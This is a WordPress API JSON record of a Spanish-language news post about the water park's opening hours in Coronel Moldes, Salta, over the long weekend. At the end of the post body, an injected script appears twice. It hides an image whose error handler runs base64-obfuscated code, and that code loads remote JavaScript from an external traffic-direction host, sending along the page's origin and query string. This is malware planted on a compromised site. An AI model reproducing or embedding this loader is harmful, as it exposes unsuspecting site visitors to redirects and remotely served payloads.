{"id":3903,"date":"2024-03-27T10:13:58","date_gmt":"2024-03-27T13:13:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3903"},"modified":"2025-08-13T23:57:33","modified_gmt":"2025-08-14T02:57:33","slug":"horarios-del-parque-acuatico-el-fin-de-semana-largo-en-coronel-moldes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3903","title":{"rendered":"Horarios del Parque Acu\u00e1tico el fin de semana largo en Coronel Moldes"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-b9032c5f49f13758d4b336b3a95194b3\" style=\"background-color:#124331\"><em>Desde ma\u00f1ana 28 de marzo y hasta el 2 de abril el Parque Acu\u00e1tico permanecer\u00e1 abierto en el horario de 10 a 19 hs. Est\u00e1 prohibido ingresar con bebidas alcoh\u00f3licas y mascotas<\/em><\/h3>\n\n\n\n<p>La Administraci\u00f3n de los Parques Urbanos informa los d\u00edas y horarios del Parque Acu\u00e1tico del Camping El Pr\u00e9stamo durante el fin de semana que se extiende desde ma\u00f1ana&nbsp;28 de marzo y finaliza el 2 de abril en el horario de 10 a 19 hs.<\/p>\n\n\n\n<p>Se podr\u00e1 hacer uso de las instalaciones del Parque Acu\u00e1tico desde hoy&nbsp;27 de marzo hasta el \u00faltimo d\u00eda del feriado largo; en tanto, el 3 y 4 de abril permanecer\u00e1 cerrado por mantenimiento de las piletas; se abrir\u00e1 nuevamente el 5 de abril.<\/p>\n\n\n\n<p>Se recuerda que no se puede ingresar al predio con bebidas alcoh\u00f3licas y mascotas.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/horarios-del-parque-acuatico-el-fin-de-semana-largo-94825\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde ma\u00f1ana 28 de marzo y hasta el 2 de abril el Parque Acu\u00e1tico permanecer\u00e1 abierto en el horario de 10 a 19 hs. Est\u00e1 prohibido ingresar con bebidas alcoh\u00f3licas y mascotas La Administraci\u00f3n de los Parques Urbanos informa los d\u00edas y horarios del Parque Acu\u00e1tico del Camping El Pr\u00e9stamo durante el fin de semana [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3904,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-3903","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3903"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3903"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3903\/revisions"}],"predecessor-version":[{"id":6809,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3903\/revisions\/6809"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3904"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3903"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3903"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3903"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}